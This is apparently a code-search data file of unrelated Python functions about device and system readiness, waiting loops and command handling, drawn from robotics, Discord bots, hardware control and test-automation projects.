"def get_wait_for_platform_ready_args(self,comArgs):\n params, flags = self.get_params(comArgs)\n tool = params.get('T') \n delay = 100\n timeout = params.get('P', 60)\n args = [tool, delay, timeout] \n return args",
"def waitReady(self, spin_delay=0.01):\n while not self.isReady():\n time.sleep(spin_delay)",
"def check_commands(self):\n pass",
"def do_ready(self) -> bool:\n logger.info('Device ' + self.name + ' is ready.')\n return False",
"async def on_ready():\n print('We have logged in as {0.user}'.format(client))\n global command_dictionary\n command_dictionary = get_setting_commands()",
"def test_device_command_list(self):\n actual_device_commands = set(self.sim_device.get_command_list()) - {\"Init\"}\n expected_command_list = set(\n self.sim_file_parser.get_device_command_metadata().keys()\n )\n self.assertEquals(\n actual_device_commands,\n expected_command_list,\n \"The commands specified are not present in the device\",\n )",
"def wait_until_arduino_ready():\n print(\"waiting for Ardunio to reset...\")\n\n msg = serial_port.readline().decode(\"utf-8\")\n\n while msg.find(\"Arduino is ready\") == -1:\n msg = serial_port.readline().decode(\"utf-8\")",
"def __wait_for(self, cmd_byte, rx_bytes, timeout_seconds=1.0):\n if not self.is_valid():\n return False\n t = time.time()\n remain = timeout_seconds\n while 1:\n #num_read = self.__usb_if.MPUSBRead(self.__handle_read, rx_bytes, int(remain*1000))\n #if (num_read > 0) and (rx_bytes[0]==cmd_byte):\n # return True\n rx = self.__usb_if.read(int(remain*1000))\n num_read = len(rx)\n if rx:\n rx_bytes[:] = rx\n if (num_read > 0) and (rx_bytes[0]==cmd_byte):\n return True\n remain = timeout_seconds - (time.time()-t)\n if remain <= 0:\n break\n time.sleep(0.001)\n #end 1 loop\n return False\n #end __wait_for()",
"def waitInit(client, userdata, command):\n print('User was accepted')\n\n with open(PATH_TO_USERS) as file:\n readData = json.load(file)\n \n message = {\n \"device_id\" : DEVICENAME, \"admin_list\" : []\n }\n message['admin_list'] = readData['admin_list']\n client.publish(doorUnlockedTopic, json.dumps(message), 1)",
"def check_all_systems_ready(self):\n joint_states_msg = None\n while joint_states_msg is None and not rospy.is_shutdown():\n try:\n joint_states_msg = rospy.wait_for_message(\"/joint_states\", JointState, timeout=0.1)\n self.joints_state = joint_states_msg\n rospy.logdebug(\"Current joint_states READY\")\n except Exception as e:\n self._ctrl_conn.start_controllers(controllers_on=\"joint_state_controller\") \n rospy.logdebug(\"Current joint_states not ready yet, retrying==>\"+str(e))\n\n rospy.logdebug(\"ALL SYSTEMS READY\")",
"def callback(new_commands):\n global motor_commands\n rospy.loginfo(\"Received command. Simulating...\")\n print(new_commands.data)\n\n # print(new_commands)\n new_angles = np.asarray(new_commands.data[0:4])\n new_angles = np.clip(new_angles, a_min=[M1_MIN, M2_MIN, M3_MIN, M4_MIN], a_max=[M1_MAX, M2_MAX, M3_MAX, M4_MAX])\n\n motor_commands[0, 2] = new_angles[0] * 1 # originally -1\n motor_commands[1, 2] = new_angles[1] * 1 # originally -1\n motor_commands[2, 2] = new_angles[2] * 1 # originally -PULLEY_RATIO\n motor_commands[3, 2] = new_angles[3] * 1 # originally -1\n\n motor_commands = ramp_to_pos(motor_commands)\n motor_commands[:, 1] = motor_commands[:, 2]",
"async def run_command(device, command):\n print(\"Waiting for button presses ...\")\n async for event in device.async_read_loop():\n if EV_KEY == event.type:\n key_event = evdev.KeyEvent(event)\n if evdev.KeyEvent.key_down == key_event.keystate:\n os.system(command)",
"def _check_all_systems_ready(self):\n raise NotImplementedError()",
"def _get_supported_commands(self):\n logger.info(\"Default unconfigured API, not adding any commands!\")\n pass",
"async def async_execute_command(self, command, notif):\n if command.startswith('MCU'):\n value = await self.async_call_linkplay_tcpuart(command)\n elif command == 'Reboot':\n value = await self.async_call_linkplay_httpapi(\"getStatus:ip:;reboot;\", None)\n elif command == 'PromptEnable':\n value = await self.async_call_linkplay_httpapi(\"PromptEnable\", None)\n elif command == 'PromptDisable':\n value = await self.async_call_linkplay_httpapi(\"PromptDisable\", None)\n elif command == 'RouterMultiroomEnable':\n value = await self.async_call_linkplay_httpapi(\"setMultiroomLogic:1\", None)\n elif command == 'SetRandomWifiKey':\n from random import choice\n from string import ascii_letters\n newkey = (''.join(choice(ascii_letters) for i in range(16)))\n value = await self.async_call_linkplay_httpapi(\"setNetwork:1:{0}\".format(newkey), None)\n if value == 'OK':\n value = value + \", key: \" + newkey\n else:\n value = \"key: \" + newkey\n elif command.startswith('SetApSSIDName:'):\n ssidnam = command.replace('SetApSSIDName:', '').strip()\n if ssidnam != '':\n value = await self.async_call_linkplay_httpapi(\"setSSID:{0}\".format(ssidnam), None)\n if value == 'OK':\n value = value + \", SoftAP SSID set to: \" + ssidnam\n else:\n value == \"SSID not specified correctly. You need 'SetApSSIDName: NewWifiName'\"\n elif command.startswith('WriteDeviceNameToUnit:'):\n devnam = command.replace('WriteDeviceNameToUnit:', '').strip()\n if devnam != '':\n value = await self.async_call_linkplay_httpapi(\"setDeviceName:{0}\".format(devnam), None)\n if value == 'OK':\n self._name = devnam\n value = value + \", name set to: \" + self._name\n else:\n value == \"Device name not specified correctly. You need 'WriteDeviceNameToUnit: My Device Name'\"\n elif command == 'TimeSync':\n import time\n tme = time.strftime('%Y%m%d%H%M%S')\n value = await self.async_call_linkplay_httpapi(\"timeSync:{0}\".format(tme), None)\n if value == 'OK':\n value = value + \", time: \" + tme\n elif command == 'Rescan':\n self._unav_throttle = False\n self._first_update = True\n # await self.async_schedule_update_ha_state(True)\n value = \"Scheduled to Rescan\"\n elif command == 'Update':\n # await self.async_schedule_update_ha_state(True)\n value = \"Scheduled to Update\"\n else:\n value = \"No such command implemented.\"\n _LOGGER.warning(\"Player %s command: %s, result: %s\", self.entity_id, command, value)\n\n _LOGGER.debug(\"Player %s executed command: %s, result: %s\", self.entity_id, command, value)\n\n if notif:\n self.hass.components.persistent_notification.async_create(\"<b>Executed command:</b><br>{0}<br><b>Result:</b><br>{1}\".format(command, value), title=self.entity_id)",
"def plugins_ready():\n\n for plugin in registerorder:\n plugin.ready()",
"def ready():\n\tsh('c')\n\td1out()\n\td2out()\n\td3out()\n\t#marAuxiliary.openMarShield()\t\t# N.b. if mar disconnected, will just do nothing",
"def __init_modules(self) -> None:\n\n BROADCAST_ID = 0xFFF\n\n # Reboot module\n reboot_message = self.__set_module_state(\n BROADCAST_ID, Module.State.REBOOT, Module.State.PNP_OFF\n )\n self._send_q.put(reboot_message)\n # self.__delay()\n\n # Command module pnp off\n pnp_off_message = self.__set_module_state(\n BROADCAST_ID, Module.State.RUN, Module.State.PNP_OFF\n )\n self._send_q.put(pnp_off_message)\n # self.__delay()\n\n # Command module uuid\n request_uuid_message = self.__request_uuid(BROADCAST_ID)\n self._send_q.put(request_uuid_message)\n # self.__delay()\n\n # Request topology data\n self.request_topology()\n # self.__delay()",
"def waitForCompletion(self):\n\n while(json.loads(self.robot.device())['state']!=0):\n time.sleep(0.1)\n continue\n\n return",
"def available_commands(self):\n return self._available_commands",
"def _init_commands(self):\n\t\tself.commands = {}\n\t\tself.log.info(\"Initializing commands...\")\n\t\t# Get all the commands and iterate over them\n\t\tfor command in self.conf_commands:\n\t\t\t\n\t\t\t# Verify the necessary config elements exist at all\n\t\t\tdisabled = command.get('disabled', False) # Disabled is optional, defaults to False\n\t\t\tif(disabled == True):\n\t\t\t\tcontinue;\n\t\t\tcommand_name = command.get('name', \"unknown\").lower()\n\t\t\tdescription = command.get('description', \"\")\n\t\t\tpermission_str = command.get('permission', None)\n\t\t\taction = command.get('action', None)\n\t\t\tmin_votes = command.get('min_votes', None)\n\t\t\targs = command.get('args', None)\n\t\t\taliases = command.get('aliases', None)\n\t\t\tif(command_name is None \n\t\t\t\tor permission_str is None \n\t\t\t\tor action is None \n\t\t\t\tor min_votes is None \n\t\t\t\tor args is None):\n\t\t\t\tself.log.warn(\"Command '{}': Error, missing 'permission', 'action', 'min_votes', or 'args' elements for command \".format(command_name))\n\t\t\t\tcontinue\n\n\t\t\t# Verify the votes and permission string are valid\n\t\t\tif(min_votes < 0):\n\t\t\t\tself.log.warn(\"Command '{}': Error, min_votes cannot be less than zero for command {}\".format(command_name, min_votes))\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tself.log.debug(\"Command '{}': minimum votes is {}\".format(command_name, min_votes))\n\n\t\t\ttry:\n\t\t\t\tpermission = Permission[permission_str]\n\t\t\t\tself.log.debug(\"Command '{}': permission is {}\".format(command_name, permission))\n\t\t\texcept Exception as e:\n\t\t\t\tself.log.warn(\"Command '{}': Error, permission string '{}' is invalid, must be one of: {}\".format(command_name, permission_str, Permission.__members__))\n\t\t\t\tcontinue\n\n\t\t\t# Try to get the corresponding action class\n\t\t\ttry:\n\t\t\t\tmodule = import_module(\"obs.actions.\"+action)\n\t\t\t\tclass_ = getattr(module, action)\n\t\t\t\tself.log.debug(\"Command {}: action is {}\".format(command_name, class_))\n\t\t\texcept Exception as e:\n\t\t\t\tself.log.warn(\"Command '{}': Error, no such action {} is defined. Full error: {}\".format(command_name, action, e))\n\t\t\t\tcontinue\n\n\t\t\t# Try to instantiate the action class\n\t\t\ttry:\n\t\t\t\tself.log.debug(\"Command {}: args are: {}\".format(command_name, args))\n\t\t\t\tcommand_obj = class_(self, command_name, aliases, description, permission, min_votes, args)\n\t\t\texcept ValueError as e:\n\t\t\t\tself.log.warn(e)\n\t\t\t\tcontinue\n\n\t\t\t# Add command_obj to internal reference\n\t\t\tself.commands[command_name] = command_obj\n\n\t\t\t# If there are aliases, add them too\n\t\t\t\n\t\t\tif(not aliases is None and isinstance(aliases, (list,) )):\n\t\t\t\tself.log.debug(\"Command '{}': Found aliases {}\".format(command_name, aliases))\n\t\t\t\tfor alias in aliases:\n\t\t\t\t\tself.commands[alias] = command_obj\n\t\t\telse:\n\t\t\t\tself.log.debug(\"Command '{}': No aliases\".format(command_name, aliases))\n\n\t\t# Finally after all commands have been initialized then add the help command\n\t\t#self.commands['help'] = Help(self)\n\n\t\t# Done initializing\n\t\tself.log.info(\"...Commands initialized: {}\".format(\n\t\t\t\tlist( self.commands.keys()) \n\t\t\t)\n\t\t)",
"def wait(self):\n\t\twhile True:\n\t\t\tr1 = self.zaberSend(self.translation[\"hor\"], self.cmd[\"returnStatus\"], data=0)\n\t\t\tr2 = self.zaberSend(self.translation[\"ver\"], self.cmd[\"returnStatus\"], data=0)\n\t\t\tif r1[2] == 0 and r2[2] == 0:\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\ttime.sleep(.01)",
"async def _hw_init(self):\n await self._write_async(b\":XR\\r\") # Broadcast: initialize + execute\n # Note: no need to consume reply here because there is none (since we are using broadcast)",
"async def on_ready(self):\n if not hasattr(self.bot, 'uptime'):\n self.bot.uptime = datetime.utcnow()\n\n # Check if user desires to have something other than online\n status = config.STATUS_TYPE.lower()\n status_type = {\"idle\": discord.Status.idle, \"dnd\": discord.Status.dnd}\n\n # Check if user desires to have a different type of activity\n activity = config.ACTIVITY_TYPE.lower()\n activity_type = {\"listening\": 2, \"watching\": 3, \"competing\": 5}\n\n await self.bot.change_presence(\n activity=discord.Game(type=activity_type.get(activity, 0), name=config.ACTIVITY),\n status=status_type.get(status, discord.Status.online)\n )\n\n # Indicate that the bot has successfully booted up\n print(f'Ready: {self.bot.user} | Servers: {len(self.bot.guilds)}')",
"def run_commands(ip_address, user, password, commandList, platform, buffer=5000):\n print \"Configuring \" + ip_address\n remote_conn_pre = paramiko.SSHClient()\n remote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n remote_conn_pre.connect(ip_address, username=user, password=password)\n remote_conn = remote_conn_pre.invoke_shell()\n if platform == \"cisco\":\n remote_conn.send(\"enable\\n\")\n time.sleep(1)\n remote_conn.send(password+'\\n')\n time.sleep(1)\n commands = commandList.split('\\n')\n for com in commands:\n remote_conn.send(com+'\\n')\n time.sleep(1)\n output = remote_conn.recv(buffer)\n #print output",
"def trigger_ready(self) -> None:\n self.trigger_signal(\"ready\")",
"def wait_for_server_ready(self, params):\n hub_client = QTask()\n hub_client.createBlindTask('ubqc', params)\n ret = hub_client.waitBlindTask(1)\n if ret is None:\n return False\n\n path, secret = ret\n self.entry = f\"{blindCompAddr}/{path}\"\n self.secret = secret\n\n return True",
"def _check_all_systems_ready(self):\n self.check_joint_states()\n self.check_contact_1()\n self.check_contact_2()\n self.check_collision()\n # self.check_rgb_camera()\n # self.check_rgbd_camera()\n # self.check_gripper_state()\n rospy.logdebug(\"ALL SYSTEMS READY\")",
"async def on_ready():\n # Sets bot's status\n await bot.change_presence(status=discord.Status.idle, activity=discord.Game('with your girlfriend ;)'))\n # Initial extensions to load.\n await ext_manager.load()\n\n print('Bot is ready.')",
"def ready(self):\n self.stdout.write('READY\\n')\n self.stdout.flush()",
"def __run_cmd(self, command, timeout, expected_result):\n if command.strip().lower().find(\"[sleep(\") != -1:\n command = command.strip().lower().replace(\"[sleep(\", \"\")\n command = command.replace(\")]\", \"\")\n sleep_time = float(command)\n time.sleep(sleep_time)\n status = Global.SUCCESS\n output = \"Success\"\n elif command.strip().lower().find(\"[usb_plug]\") != -1:\n if self._device is not None and self._io_card is not None:\n self._io_card.usb_host_pc_connector(True)\n self._device.connect_board()\n status = Global.SUCCESS\n output = \"Success\"\n else:\n self._logger.error(\"Cannot execute usb_plug, no io card configured.\")\n status = Global.FAILURE\n output = \"Cannot execute usb_plug, no io card configured.\"\n elif command.strip().lower().find(\"[usb_unplug]\") != -1:\n if self._device is not None and self._io_card is not None:\n self._device.disconnect_board()\n self._io_card.usb_host_pc_connector(False)\n status = Global.SUCCESS\n output = \"Success\"\n else:\n self._logger.error(\"Cannot execute usb_unplug, no io card configured.\")\n status = Global.FAILURE\n output = \"Cannot execute usb_unplug, no io card configured.\"\n elif command.strip().lower().find(\"[press_power_button(\") != -1:\n command = command.strip().lower().replace(\"[press_power_button(\", \"\")\n command = command.replace(\")]\", \"\")\n press_button_time = float(command)\n\n if self._io_card is not None:\n self._io_card.press_power_button(press_button_time)\n status = Global.SUCCESS\n output = \"Success\"\n else:\n self._logger.error(\"Cannot execute press_power_button, no io card configured.\")\n status = Global.FAILURE\n output = \"Cannot execute press_power_button, no io card configured.\"\n elif command.strip().lower().find(\"[control_relay(\") != -1:\n command = command.strip().lower().replace(\"[control_relay(\", \"\")\n command = command.replace(\")]\", \"\")\n relay_nbr = int(command.split(\",\")[0].strip())\n state = command.split(\",\")[1].strip().lower()\n\n if self._io_card is not None:\n if state == \"on\":\n self._io_card.enable_line(relay_nbr)\n elif state == \"off\":\n self._io_card.disable_line(relay_nbr)\n status = Global.SUCCESS\n output = \"Success\"\n else:\n self._logger.error(\"Cannot execute press_relay, no io card configured.\")\n status = Global.FAILURE\n output = \"Cannot execute press_relay, no io card configured.\"\n else:\n # Handle multi phone, if we issue adb command, add serial number if we have it\n if \"adb\" in command.lower():\n command = self._device.format_cmd(command)\n\n # If curlUtilities is called add the path to Campaign_report\n elif command.strip().lower().find(\"curlutilities\") != -1:\n # Add path to campaign report in CurlUtilities command\n report_tree = \\\n self._global_config.campaignConfig.get(\"campaignReportTree\")\n command += \\\n \" --output=%s\" % report_tree.get_report_path()\n\n if \"[MY_PATH]\" in command:\n command = command.replace(\"[MY_PATH]\",\n os.path.dirname(\n os.path.abspath(\n self._tc_parameters.get_file_path()))\n + os.sep)\n\n if \"[MY_DEVICE_MODEL]\" in command:\n command = command.replace(\"[MY_DEVICE_MODEL]\", self._device.get_phone_model())\n\n # We use the same python that ACS\n if \"python\" in command:\n command_list = command.split(\" \")\n # pyc replacement instead of py curently only works if RUN_FROM_TCDIRECTORY\n # is set to true\n if self._run_from_tc_directory:\n execution_path = os.path.join(self._execution_config_path,\n os.path.dirname(self._name))\n for index, command_element in enumerate(command_list):\n 
if command_element.endswith(\".py\"):\n if os.path.isfile(os.path.join(execution_path, command_element)) is False:\n pyc_cmd = command_element[:-2] + \"pyc\"\n if os.path.isfile(os.path.join(execution_path, pyc_cmd)):\n command_list[index] = pyc_cmd\n\n command = \" \".join(command_list)\n python_path = sys.executable\n command = command.replace(\"python\", python_path)\n self._logger.info(\"Using python: %s\" % python_path)\n\n if any(\"acs.py\" in cmd.lower() for cmd in command):\n # Put report into sub folder for analysis in case of error\n report_path = self._global_config.campaignConfig.get(\"campaignReportTree\").get_report_path()\n report_subfolder = os.path.join(report_path, os.path.basename(self._name))\n self._logger.info(\"Detailed results will be found at: {0}\".format(report_subfolder))\n command = \"{0} --report_folder={1}\".format(command, report_subfolder)\n\n status, _ = \\\n self.__internal_exec(command, timeout, expected_result)\n if status == Global.SUCCESS:\n output = \"Success\"\n else:\n output = \"Did not found expected result: {0}\".format(expected_result)\n\n else:\n status, stdout = \\\n self.__internal_exec(command, timeout, expected_result)\n output = \"output: {0}\".format(stdout.rstrip(\"\\r\\n\"))\n self._logger.info(output)\n\n # Remove special characters which could be stored in output message\n allowed_characters = '[^a-zA-Z0-9\\-\\+\\=\\'\\.\\:\\,\\;\\!\\?\\%\\(\\)\\#\\*\\@\\_\\n\\t]'\n parsed_output = re.sub(allowed_characters, ' ', output)\n\n return status, parsed_output",
"def setup_commands(bot):\n # Reset the bot's command setup\n bot.reset_commands()\n # Load enabled mods\n for mod in bot.enabled_mods:\n try:\n full = 'mod_%s' % mod\n m = getattr(__import__('mods.%s' % full), full)\n except Exception:\n bot.log(ERROR, 'Importing the %s mod failed!' % mod)\n sys.excepthook(*sys.exc_info())\n continue\n\n try:\n bot.installed_mods[mod] = m\n # Check for a 404 handler, and replace the current one if there is\n p404 = getattr(m, 'handle_404', None)\n if p404:\n bot.cb_404 = p404\n\n # Check for a setup function, and run it if there is\n setup = getattr(m, 'setup', None)\n if setup:\n setup(bot)\n\n # Required command bank\n for cmd in m.command_bank:\n # Get the actual function\n func = getattr(m, cmd)\n # Get the args for the command\n data = m.command_bank[cmd]\n # If data[0] is true, mod_help will recognize this command\n if data[0]:\n bot.help_db[data[1]] = parse_help(func)\n # Get the main name and aliases inserted\n for alias in data[1:]:\n bot.command_db[alias] = func\n\n # Helper function for optional nameless multiples\n def add_optional(olist, name):\n olist.extend(getattr(m, f) for f in getattr(m, name, ()))\n\n # Optional filters are loaded and added to the list\n add_optional(bot.filters, 'filters')\n\n # Ditto for time-cycle callbacks\n add_optional(bot.periodic_cbs, 'periodic')\n\n # Handlers are the same, but structured as a dict with\n # \"type\": \"single function-name\" items\n handlers = getattr(m, 'handlers', None)\n if handlers:\n for cbtype in handlers:\n bot.handlers[cbtype].append(getattr(m, handlers[cbtype]))\n\n # Register any requirements\n # NOTE: By putting this at the end, we avoid the possibility of\n # getting fake requires.\n reqs = getattr(m, 'requires', None)\n if reqs:\n bot.required_mods.update(reqs)\n except Exception:\n bot.log(ERROR, 'Unable to install the %s mod!' % mod)\n del bot.installed_mods[mod]\n sys.excepthook(*sys.exc_info())\n\n missing = bot.required_mods - set(bot.installed_mods)\n if missing:\n raise MissingRequirementsError(missing)\n\n # And now for the post-install triggers.\n for mod, m in bot.installed_mods.items():\n post = getattr(m, 'post_prepare', None)\n if post:\n try:\n post(bot)\n except Exception:\n bot.log(ERROR, 'Unable to post-prepare the %s mod!' % mod)\n sys.excepthook(*sys.exc_info())",
"def _check_all_systems_ready(self):\n for r in self.robots:\n r.joints = None\n while r.joints is None and not rospy.is_shutdown():\n try:\n r.joints = rospy.wait_for_message(\n r.ns + '/joint_states', JointState, timeout=3.0)\n except:\n rospy.logerr(\"Current /joint_states not ready yet.\\n\\\n Do you spawn the robot and launch ros_control?\")\n try:\n r.model_index = rospy.wait_for_message('/gazebo/model_states', ModelStates, 3).name.index(r.ns[1:])\n except rospy.exceptions.ROSException:\n rospy.logerr(\"Robot model does not exist.\")\n\n # rospy.logdebug(\"ALL SYSTEMS READY\")\n return True",
"def waitonwalk(pidevice, channels, timeout=300, predelay=0, postdelay=0, polldelay=0.1):\n if not isdeviceavailable([GCS2Commands, GCS21Commands], pidevice):\n raise TypeError('Type %s of pidevice is not supported!' % type(pidevice).__name__)\n\n channels = channels if isinstance(channels, (list, set, tuple)) else [channels]\n if not channels:\n return\n maxtime = time() + timeout\n waitonready(pidevice, timeout=timeout, predelay=predelay, polldelay=polldelay)\n while not all(list(x == 0 for x in list(pidevice.qOSN(channels).values()))):\n if time() > maxtime:\n stopall(pidevice)\n raise SystemError('waitonwalk() timed out after %.1f seconds' % timeout)\n sleep(polldelay)\n sleep(postdelay)",
"def _ready(cls):\n sync_call(cls.ready)",
"def initialize_ready_tasks(self):\n self._write_transaction(tx.set_runnable_tasks_to_ready)",
"def is_ready() -> bool:\n return True",
"def _wait_for_ready(self):\n while not self._ready_to_evict():\n if self._ready_waited > self._ready_timeout:\n raise ClusterTimeout()\n\n time.sleep(self.POLL_PERIOD)\n self._ready_waited += self.POLL_PERIOD\n\n self._mds_map = self._volume_client._rados_command(\"mds dump\", {})",
"def if_ready(self, **kwargs):\n return True",
"def _check_all_systems_ready(self):\n \n self._check_all_sensors_ready()\n #self._check_joint_states_ready()\n self._check_cmd_vel_pub()\n \n return True",
"def commands():\n # Check invalid command\n check50.run(run_command).stdin(\"cs50\").stdout(\"Invalid command.\")\n\n # Check for upper case abreviation\n try:\n check50.run(run_command).stdin(\"W\").stdout(room_2_description)\n except check50.Failure as error:\n raise check50.Failure(f\"Could not use abbreviation 'w' to move\")\n\n # Check for lower case abbreviation\n try:\n check50.run(run_command).stdin(\"w\").stdout(room_2_description)\n except check50.Failure as error:\n raise check50.Failure(f\"Could not use abbreviation 'w' to move\")",
"async def async_trigger_ready(self) -> None:\n await self.async_trigger_signal(\"ready\")",
"def getUARTFrameReady():\r\n serialRead()\r\n serialRead()",
"def wait_until_units_startup(timeout = '30', *units):\r\n not_ready_units = list(units)\r\n ready_units = []\r\n ping_time_interval = 10 # ping all units every 10 seconds\r\n time_is_up = int(timeout)\r\n\r\n while len(not_ready_units) != 0 and time_is_up > 0:\r\n start_ping_time = time.time() # get start ping time\r\n\r\n for unit in not_ready_units:\r\n ping_result = ping_remote_system(unit)\r\n if ping_result[0][2] == '0': # ping OK which means unit is ready\r\n ready_units.append(unit)\r\n\r\n # remove units which is already ping successfully\r\n for ready_unit in ready_units:\r\n try:\r\n not_ready_units.remove(ready_unit)\r\n except ValueError:\r\n pass\r\n ready_units = [] # empty the ready_units\r\n\r\n end_ping_time = time.time() # get end ping time\r\n consume_ping_time = int(end_ping_time - start_ping_time)\r\n time_is_up = time_is_up - consume_ping_time\r\n time.sleep(ping_time_interval)\r\n\r\n if len(not_ready_units) != 0: # still some units are not ready\r\n raise Exception, 'there are still some units (%s) not in working state' % not_ready_units",
"def commands():\n pass",
"def commands():\n pass",
"def commands():\n pass",
"def commands():\n pass",
"def _read_until(self, expected_cmds, adb_info):\n cmd, _, _, data = self._io_manager.read(expected_cmds, adb_info, allow_zeros=True)\n\n # Acknowledge write packets\n if cmd == constants.WRTE:\n self._okay(adb_info)\n\n return cmd, data",
"def HasPendingCommands(self):\n\t\n return self.queue.qsize() > 0",
"def setup_commands(self):\n return self.get_data(\"setup_commands\")",
"def _check_all_systems_ready(self):\n self._check_all_sensors_ready()\n return True",
"def _check_all_systems_ready(self):\n self._check_all_sensors_ready()\n return True",
"def _execute(self):\n LOG.info(\"Waiting for a message...\")",
"async def on_ready():\n # Set presence of bot\n await client.change_presence(status=discord.Status.online)\n change_status.start()\n\n # Checks for new / removed guilds after downtime\n guilds.check_guilds(client)\n\n # States, that the bot is ready\n print(\"{} is logged in as user {}\".format(appearance.bot_name, client.user.name))",
"def _command(self, commands):\n# \"\"\"Send command to spi bus of display chip, most DC pin need set to LOW \"\"\"\n# if self._spi == None: raise \"Do not setting SPI\"\n# GPIO.output( self._spi_dc, 0 )\n# self._spi.writebytes( commands )\n raise NotImplementedError",
"def set_wait_for_do_startup(self) -> MessageBoardBuilder:\n brd = get_message_board_builder()\n # set sdp master and sdp subarray to be waited before startup completes\n brd.set_waiting_on(self._tel.sdp.master).for_attribute(\"state\").to_become_equal_to(\n \"ON\", ignore_first=False\n )\n for index in range(1, self.nr_of_subarrays + 1):\n brd.set_waiting_on(self._tel.sdp.subarray(index)).for_attribute(\n \"state\"\n ).to_become_equal_to(\"ON\", ignore_first=False)\n # set csp controller and csp subarray to be waited\n # before startup completes\n brd.set_waiting_on(self._tel.csp.controller).for_attribute(\"state\").to_become_equal_to(\n \"ON\", ignore_first=False\n )\n for index in range(1, self.nr_of_subarrays + 1):\n brd.set_waiting_on(self._tel.csp.subarray(index)).for_attribute(\n \"state\"\n ).to_become_equal_to(\"ON\", ignore_first=False)\n # we wait for cbf vccs to be in proper initialised state\n if self._tel.skamid:\n brd.set_waiting_on(self._tel.csp.cbf.controller).for_attribute(\n \"reportVccState\"\n ).to_become_equal_to([\"[0, 0, 0, 0]\", \"[0 0 0 0]\"], ignore_first=False)\n # set dish master to be waited before startup completes\n if self._tel.skamid:\n for dish in self._tel.skamid.dishes(self.receptors):\n brd.set_waiting_on(dish).for_attribute(\"state\").to_become_equal_to(\n \"ON\", ignore_first=False\n )\n # set centralnode telescopeState waited before startup completes\n brd.set_waiting_on(self._tel.tm.central_node).for_attribute(\n \"telescopeState\"\n ).to_become_equal_to(\"ON\", ignore_first=False)\n return brd",
"def requestReady(self):\n if self.team[self.team_num][self.map_pos].avatarLabel['text'] == \"\":\n return;\n \n if self.isHost:\n obj = {\"worldName\":self.worldInfo.worldName}\n main.cManager.sendRequest(Constants.CMSG_START_TO_READY_GAME, obj)\n \n else:\n obj ={\"worldName\": self.worldInfo.worldName}\n main.cManager.sendRequest(Constants.CMSG_READY, obj)\n self.isReady = 1",
"async def on_ready():\n print(f'{bot.user} has connected!')\n try:\n await pull_prev_info()\n except Exception as e:\n print(\"Error in starting function with pulling previous information:\")\n print(e)\n\n try:\n await update_tournament_list()\n except Exception as e:\n print(\"Error in starting function with updating tournament list:\")\n print(e)\n\n try:\n refresh_sheet.start()\n except Exception as e:\n print(\"Error in starting function with updating tournament list:\")\n print(e)\n\n post_something.start()\n cron.start()\n go_stylist.start()\n manage_welcome.start()\n store_variables.start()\n change_bot_status.start()\n update_member_count.start()",
"async def _command_dispatcher(self):\n # sysex commands are assembled into this list for processing\n #checkingport = self.serial_port.com_port\n logstring(\"Starting Command Dispatcher\")\n sysex = []\n while True:\n if self._valid_target_exists:\n #logstring(\"Command Dispatcher: Valid Target\")\n try:\n #logstring(\"Command Dispatcher: Reading Next Byte\")\n #donothing = self.donothingatall()\n #logstring(\"Command Dispatcher: didnothingatall\")\n next_command_byte = await self.read_next_byte()\n #logstring(\"Command Dispatcher: Next Byte Read {}\".format(next_command_byte))\n # if this is a SYSEX command, then assemble the entire\n # command process it\n if next_command_byte == PrivateConstants.START_SYSEX:\n while next_command_byte != PrivateConstants.END_SYSEX:\n # because self. is awaited, i think we can remove this sleep, and the next\n #await asyncio.sleep(self.sleep_tune)\n next_command_byte = await self.read_next_byte()\n sysex.append(next_command_byte)\n await self.command_dictionary[sysex[0]](sysex)\n sysex = []\n await asyncio.sleep(self.sleep_tune)\n # if this is an analog message, process it.\n elif 0xE0 <= next_command_byte <= 0xEF:\n # analog message\n # assemble the entire analog message in command\n command = []\n # get the pin number for the message\n pin = next_command_byte & 0x0f\n command.append(pin)\n # get the next 2 bytes for the command\n command = await self._wait_for_data(command, 2)\n # process the analog message\n logstring(\"Analog Message received {}\".format(command))\n await self._analog_message(command)\n # handle the digital message\n elif 0x90 <= next_command_byte <= 0x9F:\n command = []\n port = next_command_byte & 0x0f\n command.append(port)\n command = await self._wait_for_data(command, 2)\n await self._digital_message(command)\n # handle all other messages by looking them up in the\n # command dictionary\n elif next_command_byte in self.command_dictionary:\n await self.command_dictionary[next_command_byte]()\n await asyncio.sleep(self.sleep_tune)\n else:\n # we need to yield back to the loop\n await asyncio.sleep(self.sleep_tune)\n continue\n #logstring(\"finished this read cycle\")\n except ConnectionAbortedError as ex:\n logstring(ex)\n #print(\"An exception occurred on the asyncio event loop while receiving data. Invalid message.\")\n else:\n await asyncio.sleep(0.01)",
"def execute(self, devices, command_bytes):",
"def set_ready(self, timeout=None):\r\n\r\n # Send a message to the server, and wait for confirmation of receipt.\r\n success, reply = self._wait_for_reply(cb.CLIENTREADY, \\\r\n cb.CLIENTGOGOGO, timeout=timeout)\r\n \r\n return success",
"def check_ready(self, throw_error=True):\n\t\tshutit_global.shutit_global_object.yield_to_draw()\n\t\tcfg = self.cfg\n\t\tself.log('PHASE: check_ready', level=logging.DEBUG)\n\t\terrs = []\n\t\tself.pause_point('\\nNow checking whether we are ready to build modules configured to be built', print_input=False, level=3)\n\t\t# Find out who we are to see whether we need to log in and out or not.\n\t\tfor module_id in self.module_ids():\n\t\t\tmodule = self.shutit_map[module_id]\n\t\t\tself.log('considering check_ready (is it ready to be built?): ' + module_id, level=logging.DEBUG)\n\t\t\tif cfg[module_id]['shutit.core.module.build'] and module.module_id not in self.get_current_shutit_pexpect_session_environment().modules_ready and not self.is_installed(module):\n\t\t\t\tself.log('checking whether module is ready to build: ' + module_id, level=logging.DEBUG)\n\t\t\t\tself.login(prompt_prefix=module_id,command=shutit_global.shutit_global_object.bash_startup_command,echo=False)\n\t\t\t\t# Move to the correct directory (eg for checking for the existence of files needed for build)\n\t\t\t\trevert_dir = os.getcwd()\n\t\t\t\tself.get_current_shutit_pexpect_session_environment().module_root_dir = os.path.dirname(self.shutit_file_map[module_id])\n\t\t\t\tself.chdir(self.get_current_shutit_pexpect_session_environment().module_root_dir)\n\t\t\t\tif not self.is_ready(module) and throw_error:\n\t\t\t\t\terrs.append((module_id + ' not ready to install.\\nRead the check_ready function in the module,\\nor log messages above to determine the issue.\\n\\n', self.get_shutit_pexpect_session_from_id('target_child')))\n\t\t\t\tself.logout(echo=False)\n\t\t\t\tself.chdir(revert_dir)\n\t\treturn errs",
